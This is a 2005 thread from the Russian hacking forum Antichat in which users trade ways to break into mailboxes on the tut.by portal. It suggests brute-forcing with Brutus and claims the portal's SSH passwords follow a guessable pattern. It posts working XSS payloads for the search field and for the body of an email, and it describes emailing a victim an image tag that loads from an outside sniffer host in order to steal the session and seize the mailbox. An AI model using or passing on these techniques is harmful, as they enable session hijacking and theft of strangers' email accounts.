Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   tut.by (https://forum.antichat.xyz/showthread.php?t=10012)

Tommi 12.10.2005 20:15

tut.by
 
Народ кто-нибудь знает как ломать ящики на tut.by?

Nexwill 12.10.2005 21:21

Brutus в руки и погнал......

Tommi 12.10.2005 22:11

Брутус - это и ёжику понятно. А как-нить поумнее можно? :rolleyes:

ais+ 13.10.2005 22:04

Все сайты, которые они хостят, лежат вмесе с их мыльницей на одном серве.
ЗЫ для каждого хостящегося есть ssh. Пассы на ssh обычно:
логин - низвание сайта без домена, а пароль комбинация 9 чисел и букв.
Там дохрена сайтов с ipb и phpbb помойму до сих пор валяется.

Dronga 16.10.2005 09:15

Хм..
 
Умнее... Ищи xss. Есть пасивная в поле поискового запроса, прямо на главной, там в теге title ничего не фильтруется. xss выглядит так:
Код:

</title><script>alert('Antichat (c)!')</script>
Может пригодиться..

Dronga 16.10.2005 10:03

Взлом tut.by
 
Ну чтож.. На редкость дырявый портал. За 20 минут было обнаружено несколько активных xss в теле письма. Вот пример:

Код:

<style type="text/css">@import url(javascript:alert('Antichat have it!'));</style>
Работает в IE. Поскольку для аутентификации куки не используются, то взлом упрощается до нельзя. Всего навсего требуется сессия. Отправляешь жертве такую тему:


Код:

Привет, как дела?
<img src="http://antichat.ru/cgi-bin/s.jpg">

и подписываешься на снифер. ВСЁ! Ящик твой.

Палева - 0, эффективность - 100%, жаль пароля не будет) Очень рекомендую использовать при этом программу XSS Tester от LittleLamer. Можно скачать с этой странички.

Если прибавишь мне репутацию, то я не обижусь.

limbonic 17.10.2005 02:01

Мда ....осталось только чтобы жертва почту првоеряла через инет =))

Dronga 18.10.2005 13:43

Только осталось... Так говоришь, как будто это делают единицы) По мне так, пускай лучше меня взламает неизвестный мне тип, чем сосед по локалке, который отснифал пасс по POP3... Портал вообще безбашенный в плане безопасности.. Куда смотрят...

*Van* 18.10.2005 15:09

А если отснифовать куки с почтовика-то нельзя будет полностью забрать этот ящик себе? Т.е. сменить пароль?

Meister 18.10.2005 17:09

А я присылаю себе картинку от снифера, но не вижу себя в логах. Уже на нескольких почтах делал. Что-то изменили?


Время: 10:43